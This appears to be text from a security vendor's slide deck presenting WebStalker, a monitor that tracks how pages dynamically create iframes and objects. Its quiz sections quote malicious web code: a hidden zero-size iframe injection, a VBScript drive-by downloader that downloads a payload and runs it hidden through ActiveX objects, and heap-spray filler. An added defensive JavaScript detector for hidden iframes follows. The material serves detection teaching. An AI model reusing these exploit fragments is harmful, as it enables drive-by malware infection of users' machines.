10/2/12
www.ahnlab.com
400,000 (http://stopbadware.org)
Question 1.
Which tag was created dynamically?
<html>
<script>
document.write('<iframe height=0 width=0 src="iframe.html"></iframe>');
</script>
<iframe src="http://home.ahnlab.com"></iframe>
</html>
Question 2.
Which objects were created dynamically?
set df = document.createElement("object")
' classid of the RDS.DataSpace control, built by string concatenation
df.setAttribute "classid", "clsid" + ":BD96C556-65A3-11D0-983A-00C04FC29E36"
str1 = "Microsoft.XMLHTTP"
set x = df.CreateObject(str1, "")
str2 = "Adodb.Stream"
set S = df.CreateObject(str2, "")
S.type = 1
Question 3.
What is the memory behavior?
var slackspace = headersize + ytshell.length;          // header plus shellcode length
while (omybro.length < slackspace) omybro += omybro;   // grow the filler string
bZmybr = omybro.substring(0, slackspace);
woaixiaoyu = omybro.substring(0, omybro.length - slackspace);
// keep doubling until the block approaches 0x30000 characters
while (woaixiaoyu.length + slackspace < 0x30000) woaixiaoyu = woaixiaoyu + woaixiaoyu + bZmybr;
memory = new Array();
Question 4.
Who is the criminal?
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"test","","open",0
WebStalker!
Answer 1.
Which tag was created dynamically?
<html>
<script>
document.write('<iframe height=0 width=0 src="iframe.html"></iframe>');
</script>
<iframe src="http://home.ahnlab.com"></iframe>
</html>
Answer 2.
Which objects were created dynamically?
set df = document.createElement("object")
' classid of the RDS.DataSpace control, built by string concatenation
df.setAttribute "classid", "clsid" + ":BD96C556-65A3-11D0-983A-00C04FC29E36"
str1 = "Microsoft.XMLHTTP"
set x = df.CreateObject(str1, "")
str2 = "Adodb.Stream"
set S = df.CreateObject(str2, "")
S.type = 1
Answer 3.
What is the memory behavior?
var slackspace = headersize + ytshell.length;          // header plus shellcode length
while (omybro.length < slackspace) omybro += omybro;   // grow the filler string
bZmybr = omybro.substring(0, slackspace);
woaixiaoyu = omybro.substring(0, omybro.length - slackspace);
// keep doubling until the block approaches 0x30000 characters
while (woaixiaoyu.length + slackspace < 0x30000) woaixiaoyu = woaixiaoyu + woaixiaoyu + bZmybr;
memory = new Array();
Answer 4.
Who is the criminal?
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"test","","open",0
How does WebStalker work?
WebStalker: PET Behavior Monitor
Overview:
Document (http://www.foo.com) -> script -> iframe -> Document (http://www.bar.com)

Step 1. CreateMarkup()
Document
<script>
document.write('<iframe height=0 width=0 src="http://www.bar.com"></iframe>');
</script>

Step 2. CHTMLoad::Init()
Document (http://www.foo.com)
<script>
document.write('<iframe height=0 width=0 src="http://www.bar.com"></iframe>');
</script>

Step 3. CreateElement()
Document (http://www.foo.com), same script as above
Elements created: script

Step 4. CHtmScriptParseCtx()
Document (http://www.foo.com), same script as above
Elements created: script
Context stack: [script context]

Step 5. CHtmIframeParseCtx()
Document (http://www.foo.com), same script as above
Elements created: script, iframe
Context stack: [iframe context, script context]

Result:
Document (http://www.foo.com) -> script -> iframe -> Document (http://www.bar.com)
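Added example, not code from the AhnLab deck: a stand-alone JavaScript model of the check the diagram above implies for Question 1, written from the monitoring side. It wraps document.write, parses any <iframe> the script emits, and reports hidden ones together with whether the src host differs from the parent document's; it goes slightly beyond the slides' height=0 width=0 case by also treating display:none and visibility:hidden as hidden. The fake document object and the www.foo.com / www.bar.com URLs are constructed for the demo.

```javascript
const IFRAME_RE = /<iframe\b([^>]*)>/gi;
// Values may be "quoted", 'quoted' or bare; a bare value stops at whitespace,
// a quote or '>', so a stray trailing quote does not leak into it.
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
  }
  return attrs;
}

// Slides show the height=0 width=0 case; display:none / visibility:hidden are
// the same trick expressed through CSS, so they are treated alike here.
function isHidden(attrs) {
  const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
  return attrs.height === '0' || attrs.width === '0' ||
    style.includes('display:none') || style.includes('visibility:hidden');
}

// One record per hidden iframe in markup written into the document loaded from
// parentUrl. A relative src resolves against parentUrl, as the browser would.
function findHiddenIframes(parentUrl, writtenMarkup) {
  const parentHost = new URL(parentUrl).hostname;
  const findings = [];
  for (const m of writtenMarkup.matchAll(IFRAME_RE)) {
    const attrs = parseAttrs(m[1]);
    if (!isHidden(attrs)) continue;
    let host = null;
    try { host = new URL(attrs.src || '', parentUrl).hostname; } catch (e) { /* unparsable src */ }
    findings.push({ src: attrs.src || '', host, crossHost: host !== null && host !== parentHost });
  }
  return findings;
}

// Wraps doc.write so each write is inspected before its markup reaches the
// parser, the point the diagram labels CreateMarkup()/CreateElement().
function installWriteMonitor(doc, parentUrl, onFinding) {
  const originalWrite = doc.write.bind(doc);
  doc.write = function (markup) {
    for (const f of findHiddenIframes(parentUrl, String(markup))) onFinding(f);
    return originalWrite(markup);
  };
}

// Constructed demo with a fake document object so this also runs under Node.
const seen = [];
const fakeDoc = { html: '', write(markup) { this.html += markup; } };
installWriteMonitor(fakeDoc, 'http://www.foo.com/', (f) => seen.push(f));
fakeDoc.write('<iframe height=0 width=0 src="http://www.bar.com"></iframe>');
```

In a real page the same call is installWriteMonitor(document, location.href, report); the parser still receives the markup unchanged, so the monitor observes without altering rendering.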
WebStalker